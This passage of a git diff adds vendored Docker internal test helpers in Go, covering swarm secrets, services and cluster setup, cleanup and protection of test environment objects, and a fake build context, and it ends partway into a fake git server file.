assert.TestingT, id string) *swarm.Secret { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + secret, _, err := cli.SecretInspectWithRaw(context.Background(), id) + assert.NilError(t, err) + return &secret +} + +// DeleteSecret removes the swarm secret identified by the specified id +func (d *Daemon) DeleteSecret(t assert.TestingT, id string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + err := cli.SecretRemove(context.Background(), id) + assert.NilError(t, err) +} + +// UpdateSecret updates the swarm secret identified by the specified id +// Currently, only label update is supported. +func (d *Daemon) UpdateSecret(t assert.TestingT, id string, f ...SecretConstructor) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + secret := d.GetSecret(t, id) + for _, fn := range f { + fn(secret) + } + + err := cli.SecretUpdate(context.Background(), secret.ID, secret.Version, secret.Spec) + + assert.NilError(t, err) +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/service.go b/vendor/github.com/docker/docker/internal/test/daemon/service.go new file mode 100644 index 0000000000..0f88ca786b --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/service.go @@ -0,0 +1,131 @@ +package daemon + +import ( + "context" + "time" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +// ServiceConstructor defines a swarm service constructor function +type ServiceConstructor func(*swarm.Service) + +func (d *Daemon) createServiceWithOptions(t assert.TestingT, opts types.ServiceCreateOptions, f ...ServiceConstructor) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + var service swarm.Service + for _, fn := range f { + fn(&service) + } + + cli := d.NewClientT(t) + defer cli.Close() + + ctx, cancel := context.WithTimeout(context.Background(), 30*time.Second) + defer cancel() + + res, err := cli.ServiceCreate(ctx, service.Spec, opts) + assert.NilError(t, err) + return res.ID +} + +// CreateService creates a swarm service given the specified service constructor +func (d *Daemon) CreateService(t assert.TestingT, f ...ServiceConstructor) string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + return d.createServiceWithOptions(t, types.ServiceCreateOptions{}, f...) +} + +// GetService returns the swarm service corresponding to the specified id +func (d *Daemon) GetService(t assert.TestingT, id string) *swarm.Service { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + service, _, err := cli.ServiceInspectWithRaw(context.Background(), id, types.ServiceInspectOptions{}) + assert.NilError(t, err) + return &service +} + +// GetServiceTasks returns the swarm tasks for the specified service +func (d *Daemon) GetServiceTasks(t assert.TestingT, service string) []swarm.Task { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + filterArgs := filters.NewArgs() + filterArgs.Add("desired-state", "running") + filterArgs.Add("service", service) + + options := types.TaskListOptions{ + Filters: filterArgs, + } + + tasks, err := cli.TaskList(context.Background(), options) + assert.NilError(t, err) + return tasks +} + +// UpdateService updates a swarm service with the specified service constructor +func (d *Daemon) UpdateService(t assert.TestingT, service *swarm.Service, f ...ServiceConstructor) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + for _, fn := range f { + fn(service) + } + + _, err := cli.ServiceUpdate(context.Background(), service.ID, service.Version, service.Spec, types.ServiceUpdateOptions{}) + assert.NilError(t, err) +} + +// RemoveService removes the specified service +func (d *Daemon) RemoveService(t assert.TestingT, id string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + err := cli.ServiceRemove(context.Background(), id) + assert.NilError(t, err) +} + +// ListServices returns the list of the current swarm services +func (d *Daemon) ListServices(t assert.TestingT) []swarm.Service { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + services, err := cli.ServiceList(context.Background(), types.ServiceListOptions{}) + assert.NilError(t, err) + return services +} + +// GetTask returns the swarm task identified by the specified id +func (d *Daemon) GetTask(t assert.TestingT, id string) swarm.Task { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + task, _, err := cli.TaskInspectWithRaw(context.Background(), id) + assert.NilError(t, err) + return task +} diff --git a/vendor/github.com/docker/docker/internal/test/daemon/swarm.go b/vendor/github.com/docker/docker/internal/test/daemon/swarm.go new file mode 100644 index 0000000000..e8e8b945de --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/daemon/swarm.go @@ -0,0 +1,194 @@ +package daemon + +import ( + "context" + "fmt" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/internal/test" + "github.com/pkg/errors" + "gotest.tools/assert" +) + +const ( + // DefaultSwarmPort is the default port use for swarm in the tests + DefaultSwarmPort = 2477 + defaultSwarmListenAddr = "0.0.0.0" +) + +// StartAndSwarmInit starts the daemon (with busybox) and init the swarm +func (d *Daemon) StartAndSwarmInit(t testingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + // avoid networking conflicts + args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"} + d.StartWithBusybox(t, args...) + + d.SwarmInit(t, swarm.InitRequest{}) +} + +// StartAndSwarmJoin starts the daemon (with busybox) and join the specified swarm as worker or manager +func (d *Daemon) StartAndSwarmJoin(t testingT, leader *Daemon, manager bool) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + // avoid networking conflicts + args := []string{"--iptables=false", "--swarm-default-advertise-addr=lo"} + d.StartWithBusybox(t, args...) + + tokens := leader.JoinTokens(t) + token := tokens.Worker + if manager { + token = tokens.Manager + } + d.SwarmJoin(t, swarm.JoinRequest{ + RemoteAddrs: []string{leader.SwarmListenAddr()}, + JoinToken: token, + }) +} + +// SpecConstructor defines a swarm spec constructor +type SpecConstructor func(*swarm.Spec) + +// SwarmListenAddr returns the listen-addr used for the daemon +func (d *Daemon) SwarmListenAddr() string { + return fmt.Sprintf("%s:%d", d.swarmListenAddr, d.SwarmPort) +} + +// NodeID returns the swarm mode node ID +func (d *Daemon) NodeID() string { + return d.CachedInfo.Swarm.NodeID +} + +// SwarmInit initializes a new swarm cluster. +func (d *Daemon) SwarmInit(t assert.TestingT, req swarm.InitRequest) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + if req.ListenAddr == "" { + req.ListenAddr = fmt.Sprintf("%s:%d", d.swarmListenAddr, d.SwarmPort) + } + cli := d.NewClientT(t) + defer cli.Close() + _, err := cli.SwarmInit(context.Background(), req) + assert.NilError(t, err, "initializing swarm") + d.CachedInfo = d.Info(t) +} + +// SwarmJoin joins a daemon to an existing cluster. +func (d *Daemon) SwarmJoin(t assert.TestingT, req swarm.JoinRequest) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + if req.ListenAddr == "" { + req.ListenAddr = fmt.Sprintf("%s:%d", d.swarmListenAddr, d.SwarmPort) + } + cli := d.NewClientT(t) + defer cli.Close() + err := cli.SwarmJoin(context.Background(), req) + assert.NilError(t, err, "initializing swarm") + d.CachedInfo = d.Info(t) +} + +// SwarmLeave forces daemon to leave current cluster. +func (d *Daemon) SwarmLeave(force bool) error { + cli, err := d.NewClient() + if err != nil { + return fmt.Errorf("leaving swarm: failed to create client %v", err) + } + defer cli.Close() + err = cli.SwarmLeave(context.Background(), force) + if err != nil { + err = fmt.Errorf("leaving swarm: %v", err) + } + return err +} + +// SwarmInfo returns the swarm information of the daemon +func (d *Daemon) SwarmInfo(t assert.TestingT) swarm.Info { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + info, err := cli.Info(context.Background()) + assert.NilError(t, err, "get swarm info") + return info.Swarm +} + +// SwarmUnlock tries to unlock a locked swarm +func (d *Daemon) SwarmUnlock(req swarm.UnlockRequest) error { + cli, err := d.NewClient() + if err != nil { + return fmt.Errorf("unlocking swarm: failed to create client %v", err) + } + defer cli.Close() + err = cli.SwarmUnlock(context.Background(), req) + if err != nil { + err = errors.Wrap(err, "unlocking swarm") + } + return err +} + +// GetSwarm returns the current swarm object +func (d *Daemon) GetSwarm(t assert.TestingT) swarm.Swarm { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + sw, err := cli.SwarmInspect(context.Background()) + assert.NilError(t, err) + return sw +} + +// UpdateSwarm updates the current swarm object with the specified spec constructors +func (d *Daemon) UpdateSwarm(t assert.TestingT, f ...SpecConstructor) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + sw := d.GetSwarm(t) + for _, fn := range f { + fn(&sw.Spec) + } + + err := cli.SwarmUpdate(context.Background(), sw.Version, sw.Spec, swarm.UpdateFlags{}) + assert.NilError(t, err) +} + +// RotateTokens update the swarm to rotate tokens +func (d *Daemon) RotateTokens(t assert.TestingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + sw, err := cli.SwarmInspect(context.Background()) + assert.NilError(t, err) + + flags := swarm.UpdateFlags{ + RotateManagerToken: true, + RotateWorkerToken: true, + } + + err = cli.SwarmUpdate(context.Background(), sw.Version, sw.Spec, flags) + assert.NilError(t, err) +} + +// JoinTokens returns the current swarm join tokens +func (d *Daemon) JoinTokens(t assert.TestingT) swarm.JoinTokens { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + cli := d.NewClientT(t) + defer cli.Close() + + sw, err := cli.SwarmInspect(context.Background()) + assert.NilError(t, err) + return sw.JoinTokens +} diff --git a/vendor/github.com/docker/docker/internal/test/environment/clean.go b/vendor/github.com/docker/docker/internal/test/environment/clean.go new file mode 100644 index 0000000000..93dee593f2 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/environment/clean.go @@ -0,0 +1,217 @@ +package environment // import "github.com/docker/docker/internal/test/environment" + +import ( + "context" + "regexp" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/client" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +type testingT interface { + assert.TestingT + logT + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +// Clean the environment, preserving protected objects (images, containers, ...) +// and removing everything else. It's meant to run after any tests so that they don't +// depend on each others. +func (e *Execution) Clean(t assert.TestingT) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := e.APIClient() + + platform := e.OSType + if (platform != "windows") || (platform == "windows" && e.DaemonInfo.Isolation == "hyperv") { + unpauseAllContainers(t, client) + } + deleteAllContainers(t, client, e.protectedElements.containers) + deleteAllImages(t, client, e.protectedElements.images) + deleteAllVolumes(t, client, e.protectedElements.volumes) + deleteAllNetworks(t, client, platform, e.protectedElements.networks) + if platform == "linux" { + deleteAllPlugins(t, client, e.protectedElements.plugins) + } +} + +func unpauseAllContainers(t assert.TestingT, client client.ContainerAPIClient) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + ctx := context.Background() + containers := getPausedContainers(ctx, t, client) + if len(containers) > 0 { + for _, container := range containers { + err := client.ContainerUnpause(ctx, container.ID) + assert.Check(t, err, "failed to unpause container %s", container.ID) + } + } +} + +func getPausedContainers(ctx context.Context, t assert.TestingT, client client.ContainerAPIClient) []types.Container { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + filter := filters.NewArgs() + filter.Add("status", "paused") + containers, err := client.ContainerList(ctx, types.ContainerListOptions{ + Filters: filter, + Quiet: true, + All: true, + }) + assert.Check(t, err, "failed to list containers") + return containers +} + +var alreadyExists = regexp.MustCompile(`Error response from daemon: removal of container (\w+) is already in progress`) + +func deleteAllContainers(t assert.TestingT, apiclient client.ContainerAPIClient, protectedContainers map[string]struct{}) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + ctx := context.Background() + containers := getAllContainers(ctx, t, apiclient) + if len(containers) == 0 { + return + } + + for _, container := range containers { + if _, ok := protectedContainers[container.ID]; ok { + continue + } + err := apiclient.ContainerRemove(ctx, container.ID, types.ContainerRemoveOptions{ + Force: true, + RemoveVolumes: true, + }) + if err == nil || client.IsErrNotFound(err) || alreadyExists.MatchString(err.Error()) || isErrNotFoundSwarmClassic(err) { + continue + } + assert.Check(t, err, "failed to remove %s", container.ID) + } +} + +func getAllContainers(ctx context.Context, t assert.TestingT, client client.ContainerAPIClient) []types.Container { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + containers, err := client.ContainerList(ctx, types.ContainerListOptions{ + Quiet: true, + All: true, + }) + assert.Check(t, err, "failed to list containers") + return containers +} + +func deleteAllImages(t assert.TestingT, apiclient client.ImageAPIClient, protectedImages map[string]struct{}) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + images, err := apiclient.ImageList(context.Background(), types.ImageListOptions{}) + assert.Check(t, err, "failed to list images") + + ctx := context.Background() + for _, image := range images { + tags := tagsFromImageSummary(image) + if len(tags) == 0 { + removeImage(ctx, t, apiclient, image.ID) + continue + } + for _, tag := range tags { + if _, ok := protectedImages[tag]; !ok { + removeImage(ctx, t, apiclient, tag) + } + } + } +} + +func removeImage(ctx context.Context, t assert.TestingT, apiclient client.ImageAPIClient, ref string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + _, err := apiclient.ImageRemove(ctx, ref, types.ImageRemoveOptions{ + Force: true, + }) + if client.IsErrNotFound(err) { + return + } + assert.Check(t, err, "failed to remove image %s", ref) +} + +func deleteAllVolumes(t assert.TestingT, c client.VolumeAPIClient, protectedVolumes map[string]struct{}) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + volumes, err := c.VolumeList(context.Background(), filters.Args{}) + assert.Check(t, err, "failed to list volumes") + + for _, v := range volumes.Volumes { + if _, ok := protectedVolumes[v.Name]; ok { + continue + } + err := c.VolumeRemove(context.Background(), v.Name, true) + // Docker EE may list volumes that no longer exist. + if isErrNotFoundSwarmClassic(err) { + continue + } + assert.Check(t, err, "failed to remove volume %s", v.Name) + } +} + +func deleteAllNetworks(t assert.TestingT, c client.NetworkAPIClient, daemonPlatform string, protectedNetworks map[string]struct{}) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + networks, err := c.NetworkList(context.Background(), types.NetworkListOptions{}) + assert.Check(t, err, "failed to list networks") + + for _, n := range networks { + if n.Name == "bridge" || n.Name == "none" || n.Name == "host" { + continue + } + if _, ok := protectedNetworks[n.ID]; ok { + continue + } + if daemonPlatform == "windows" && strings.ToLower(n.Name) == "nat" { + // nat is a pre-defined network on Windows and cannot be removed + continue + } + err := c.NetworkRemove(context.Background(), n.ID) + assert.Check(t, err, "failed to remove network %s", n.ID) + } +} + +func deleteAllPlugins(t assert.TestingT, c client.PluginAPIClient, protectedPlugins map[string]struct{}) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + plugins, err := c.PluginList(context.Background(), filters.Args{}) + // Docker EE does not allow cluster-wide plugin management. + if client.IsErrNotImplemented(err) { + return + } + assert.Check(t, err, "failed to list plugins") + + for _, p := range plugins { + if _, ok := protectedPlugins[p.Name]; ok { + continue + } + err := c.PluginRemove(context.Background(), p.Name, types.PluginRemoveOptions{Force: true}) + assert.Check(t, err, "failed to remove plugin %s", p.ID) + } +} + +// Swarm classic aggregates node errors and returns a 500 so we need to check +// the error string instead of just IsErrNotFound(). +func isErrNotFoundSwarmClassic(err error) bool { + return err != nil && strings.Contains(strings.ToLower(err.Error()), "no such") +} diff --git a/vendor/github.com/docker/docker/internal/test/environment/environment.go b/vendor/github.com/docker/docker/internal/test/environment/environment.go new file mode 100644 index 0000000000..74c8e2ce0a --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/environment/environment.go @@ -0,0 +1,158 @@ +package environment // import "github.com/docker/docker/internal/test/environment" + +import ( + "context" + "fmt" + "os" + "path/filepath" + "strings" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/client" + "github.com/docker/docker/internal/test/fixtures/load" + "github.com/pkg/errors" +) + +// Execution contains information about the current test execution and daemon +// under test +type Execution struct { + client client.APIClient + DaemonInfo types.Info + OSType string + PlatformDefaults PlatformDefaults + protectedElements protectedElements +} + +// PlatformDefaults are defaults values for the platform of the daemon under test +type PlatformDefaults struct { + BaseImage string + VolumesConfigPath string + ContainerStoragePath string +} + +// New creates a new Execution struct +func New() (*Execution, error) { + client, err := client.NewClientWithOpts(client.FromEnv) + if err != nil { + return nil, errors.Wrapf(err, "failed to create client") + } + + info, err := client.Info(context.Background()) + if err != nil { + return nil, errors.Wrapf(err, "failed to get info from daemon") + } + + osType := getOSType(info) + + return &Execution{ + client: client, + DaemonInfo: info, + OSType: osType, + PlatformDefaults: getPlatformDefaults(info, osType), + protectedElements: newProtectedElements(), + }, nil +} + +func getOSType(info types.Info) string { + // Docker EE does not set the OSType so allow the user to override this value. + userOsType := os.Getenv("TEST_OSTYPE") + if userOsType != "" { + return userOsType + } + return info.OSType +} + +func getPlatformDefaults(info types.Info, osType string) PlatformDefaults { + volumesPath := filepath.Join(info.DockerRootDir, "volumes") + containersPath := filepath.Join(info.DockerRootDir, "containers") + + switch osType { + case "linux": + return PlatformDefaults{ + BaseImage: "scratch", + VolumesConfigPath: toSlash(volumesPath), + ContainerStoragePath: toSlash(containersPath), + } + case "windows": + baseImage := "microsoft/windowsservercore" + if override := os.Getenv("WINDOWS_BASE_IMAGE"); override != "" { + baseImage = override + fmt.Println("INFO: Windows Base image is ", baseImage) + } + return PlatformDefaults{ + BaseImage: baseImage, + VolumesConfigPath: filepath.FromSlash(volumesPath), + ContainerStoragePath: filepath.FromSlash(containersPath), + } + default: + panic(fmt.Sprintf("unknown OSType for daemon: %s", osType)) + } +} + +// Make sure in context of daemon, not the local platform. Note we can't +// use filepath.FromSlash or ToSlash here as they are a no-op on Unix. +func toSlash(path string) string { + return strings.Replace(path, `\`, `/`, -1) +} + +// IsLocalDaemon is true if the daemon under test is on the same +// host as the test process. +// +// Deterministically working out the environment in which CI is running +// to evaluate whether the daemon is local or remote is not possible through +// a build tag. +// +// For example Windows to Linux CI under Jenkins tests the 64-bit +// Windows binary build with the daemon build tag, but calls a remote +// Linux daemon. +// +// We can't just say if Windows then assume the daemon is local as at +// some point, we will be testing the Windows CLI against a Windows daemon. +// +// Similarly, it will be perfectly valid to also run CLI tests from +// a Linux CLI (built with the daemon tag) against a Windows daemon. +func (e *Execution) IsLocalDaemon() bool { + return os.Getenv("DOCKER_REMOTE_DAEMON") == "" +} + +// IsRemoteDaemon is true if the daemon under test is on different host +// as the test process. +func (e *Execution) IsRemoteDaemon() bool { + return !e.IsLocalDaemon() +} + +// DaemonAPIVersion returns the negotiated daemon api version +func (e *Execution) DaemonAPIVersion() string { + version, err := e.APIClient().ServerVersion(context.TODO()) + if err != nil { + return "" + } + return version.APIVersion +} + +// Print the execution details to stdout +// TODO: print everything +func (e *Execution) Print() { + if e.IsLocalDaemon() { + fmt.Println("INFO: Testing against a local daemon") + } else { + fmt.Println("INFO: Testing against a remote daemon") + } +} + +// APIClient returns an APIClient connected to the daemon under test +func (e *Execution) APIClient() client.APIClient { + return e.client +} + +// EnsureFrozenImagesLinux loads frozen test images into the daemon +// if they aren't already loaded +func EnsureFrozenImagesLinux(testEnv *Execution) error { + if testEnv.OSType == "linux" { + err := load.FrozenImagesLinux(testEnv.APIClient(), frozenImages...) + if err != nil { + return errors.Wrap(err, "error loading frozen images") + } + } + return nil +} diff --git a/vendor/github.com/docker/docker/internal/test/environment/protect.go b/vendor/github.com/docker/docker/internal/test/environment/protect.go new file mode 100644 index 0000000000..b5b27d2dd4 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/environment/protect.go @@ -0,0 +1,254 @@ +package environment // import "github.com/docker/docker/internal/test/environment" + +import ( + "context" + + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/filters" + dclient "github.com/docker/docker/client" + "github.com/docker/docker/internal/test" + "gotest.tools/assert" +) + +var frozenImages = []string{"busybox:latest", "busybox:glibc", "hello-world:frozen", "debian:jessie"} + +type protectedElements struct { + containers map[string]struct{} + images map[string]struct{} + networks map[string]struct{} + plugins map[string]struct{} + volumes map[string]struct{} +} + +func newProtectedElements() protectedElements { + return protectedElements{ + containers: map[string]struct{}{}, + images: map[string]struct{}{}, + networks: map[string]struct{}{}, + plugins: map[string]struct{}{}, + volumes: map[string]struct{}{}, + } +} + +// ProtectAll protects the existing environment (containers, images, networks, +// volumes, and, on Linux, plugins) from being cleaned up at the end of test +// runs +func ProtectAll(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + ProtectContainers(t, testEnv) + ProtectImages(t, testEnv) + ProtectNetworks(t, testEnv) + ProtectVolumes(t, testEnv) + if testEnv.OSType == "linux" { + ProtectPlugins(t, testEnv) + } +} + +// ProtectContainer adds the specified container(s) to be protected in case of +// clean +func (e *Execution) ProtectContainer(t testingT, containers ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + for _, container := range containers { + e.protectedElements.containers[container] = struct{}{} + } +} + +// ProtectContainers protects existing containers from being cleaned up at the +// end of test runs +func ProtectContainers(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + containers := getExistingContainers(t, testEnv) + testEnv.ProtectContainer(t, containers...) +} + +func getExistingContainers(t assert.TestingT, testEnv *Execution) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := testEnv.APIClient() + containerList, err := client.ContainerList(context.Background(), types.ContainerListOptions{ + All: true, + }) + assert.NilError(t, err, "failed to list containers") + + var containers []string + for _, container := range containerList { + containers = append(containers, container.ID) + } + return containers +} + +// ProtectImage adds the specified image(s) to be protected in case of clean +func (e *Execution) ProtectImage(t testingT, images ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + for _, image := range images { + e.protectedElements.images[image] = struct{}{} + } +} + +// ProtectImages protects existing images and on linux frozen images from being +// cleaned up at the end of test runs +func ProtectImages(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + images := getExistingImages(t, testEnv) + + if testEnv.OSType == "linux" { + images = append(images, frozenImages...) + } + testEnv.ProtectImage(t, images...) +} + +func getExistingImages(t assert.TestingT, testEnv *Execution) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := testEnv.APIClient() + filter := filters.NewArgs() + filter.Add("dangling", "false") + imageList, err := client.ImageList(context.Background(), types.ImageListOptions{ + All: true, + Filters: filter, + }) + assert.NilError(t, err, "failed to list images") + + var images []string + for _, image := range imageList { + images = append(images, tagsFromImageSummary(image)...) + } + return images +} + +func tagsFromImageSummary(image types.ImageSummary) []string { + var result []string + for _, tag := range image.RepoTags { + if tag != ":" { + result = append(result, tag) + } + } + for _, digest := range image.RepoDigests { + if digest != "@" { + result = append(result, digest) + } + } + return result +} + +// ProtectNetwork adds the specified network(s) to be protected in case of +// clean +func (e *Execution) ProtectNetwork(t testingT, networks ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + for _, network := range networks { + e.protectedElements.networks[network] = struct{}{} + } +} + +// ProtectNetworks protects existing networks from being cleaned up at the end +// of test runs +func ProtectNetworks(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + networks := getExistingNetworks(t, testEnv) + testEnv.ProtectNetwork(t, networks...) +} + +func getExistingNetworks(t assert.TestingT, testEnv *Execution) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := testEnv.APIClient() + networkList, err := client.NetworkList(context.Background(), types.NetworkListOptions{}) + assert.NilError(t, err, "failed to list networks") + + var networks []string + for _, network := range networkList { + networks = append(networks, network.ID) + } + return networks +} + +// ProtectPlugin adds the specified plugin(s) to be protected in case of clean +func (e *Execution) ProtectPlugin(t testingT, plugins ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + for _, plugin := range plugins { + e.protectedElements.plugins[plugin] = struct{}{} + } +} + +// ProtectPlugins protects existing plugins from being cleaned up at the end of +// test runs +func ProtectPlugins(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + plugins := getExistingPlugins(t, testEnv) + testEnv.ProtectPlugin(t, plugins...) +} + +func getExistingPlugins(t assert.TestingT, testEnv *Execution) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := testEnv.APIClient() + pluginList, err := client.PluginList(context.Background(), filters.Args{}) + // Docker EE does not allow cluster-wide plugin management. + if dclient.IsErrNotImplemented(err) { + return []string{} + } + assert.NilError(t, err, "failed to list plugins") + + var plugins []string + for _, plugin := range pluginList { + plugins = append(plugins, plugin.Name) + } + return plugins +} + +// ProtectVolume adds the specified volume(s) to be protected in case of clean +func (e *Execution) ProtectVolume(t testingT, volumes ...string) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + for _, volume := range volumes { + e.protectedElements.volumes[volume] = struct{}{} + } +} + +// ProtectVolumes protects existing volumes from being cleaned up at the end of +// test runs +func ProtectVolumes(t testingT, testEnv *Execution) { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + volumes := getExistingVolumes(t, testEnv) + testEnv.ProtectVolume(t, volumes...) +} + +func getExistingVolumes(t assert.TestingT, testEnv *Execution) []string { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + client := testEnv.APIClient() + volumeList, err := client.VolumeList(context.Background(), filters.Args{}) + assert.NilError(t, err, "failed to list volumes") + + var volumes []string + for _, volume := range volumeList.Volumes { + volumes = append(volumes, volume.Name) + } + return volumes +} diff --git a/vendor/github.com/docker/docker/internal/test/fakecontext/context.go b/vendor/github.com/docker/docker/internal/test/fakecontext/context.go new file mode 100644 index 0000000000..8b11da207e --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fakecontext/context.go @@ -0,0 +1,131 @@ +package fakecontext // import "github.com/docker/docker/internal/test/fakecontext" + +import ( + "bytes" + "io" + "io/ioutil" + "os" + "path/filepath" + + "github.com/docker/docker/internal/test" + "github.com/docker/docker/pkg/archive" +) + +type testingT interface { + Fatal(args ...interface{}) + Fatalf(string, ...interface{}) +} + +// New creates a fake build context +func New(t testingT, dir string, modifiers ...func(*Fake) error) *Fake { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + fakeContext := &Fake{Dir: dir} + if dir == "" { + if err := newDir(fakeContext); err != nil { + t.Fatal(err) + } + } + + for _, modifier := range modifiers { + if err := modifier(fakeContext); err != nil { + t.Fatal(err) + } + } + + return fakeContext +} + +func newDir(fake *Fake) error { + tmp, err := ioutil.TempDir("", "fake-context") + if err != nil { + return err + } + if err := os.Chmod(tmp, 0755); err != nil { + return err + } + fake.Dir = tmp + return nil +} + +// WithFile adds the specified file (with content) in the build context +func WithFile(name, content string) func(*Fake) error { + return func(ctx *Fake) error { + return ctx.Add(name, content) + } +} + +// WithDockerfile adds the specified content as Dockerfile in the build context +func WithDockerfile(content string) func(*Fake) error { + return WithFile("Dockerfile", content) +} + +// WithFiles adds the specified files in the build context, content is a string +func WithFiles(files map[string]string) func(*Fake) error { + return func(fakeContext *Fake) error { + for file, content := range files { + if err := fakeContext.Add(file, content); err != nil { + return err + } + } + return nil + } +} + +// WithBinaryFiles adds the specified files in the build context, content is binary +func WithBinaryFiles(files map[string]*bytes.Buffer) func(*Fake) error { + return func(fakeContext *Fake) error { + for file, content := range files { + if err := fakeContext.Add(file, content.String()); err != nil { + return err + } + } + return nil + } +} + +// Fake creates directories that can be used as a build context +type Fake struct { + Dir string +} + +// Add a file at a path, creating directories where necessary +func (f *Fake) Add(file, content string) error { + return f.addFile(file, []byte(content)) +} + +func (f *Fake) addFile(file string, content []byte) error { + fp := filepath.Join(f.Dir, filepath.FromSlash(file)) + dirpath := filepath.Dir(fp) + if dirpath != "." { + if err := os.MkdirAll(dirpath, 0755); err != nil { + return err + } + } + return ioutil.WriteFile(fp, content, 0644) + +} + +// Delete a file at a path +func (f *Fake) Delete(file string) error { + fp := filepath.Join(f.Dir, filepath.FromSlash(file)) + return os.RemoveAll(fp) +} + +// Close deletes the context +func (f *Fake) Close() error { + return os.RemoveAll(f.Dir) +} + +// AsTarReader returns a ReadCloser with the contents of Dir as a tar archive. +func (f *Fake) AsTarReader(t testingT) io.ReadCloser { + if ht, ok := t.(test.HelperT); ok { + ht.Helper() + } + reader, err := archive.TarWithOptions(f.Dir, &archive.TarOptions{}) + if err != nil { + t.Fatalf("Failed to create tar from %s: %s", f.Dir, err) + } + return reader +} diff --git a/vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go b/vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go new file mode 100644 index 0000000000..605d1baaa8 --- /dev/null +++ b/vendor/github.com/docker/docker/internal/test/fakegit/fakegit.go @@ -0,0 +1,136 @@ +package fakegit // import "github.com/docker/docker/internal/test/fakegit" + +import ( + "fmt" + "io/ioutil" + "net/http" + "net/http/httptest" + "os" + "os/exec" + "path/filepath" + + "github.com/docker/docker/internal/test" + "github.com/docker/docker/internal/test/fakecontext" + "github.com/docker/docker/internal/test/fakestorage" + "gotest.tools/assert" +) + +type testingT interface { + assert.TestingT + logT + skipT + Fatal(args ...interface{}) + Fatalf(string, ...interface{}) +} + +type logT interface { + Logf(string, ...interface{}) +} + +type skipT interface { + Skip(reason string) +} + +type gitServer interface { + URL() string + Close() error +} + +type localGitServer struct { + *httptest.Server +} + +func (r *localGitServer) Close() error { + r.Server.Close() + return nil +} + +func (r *localGitServer) URL() string { + return r.Server.URL +} + +// FakeGit is a fake git server +type FakeGit struct { + 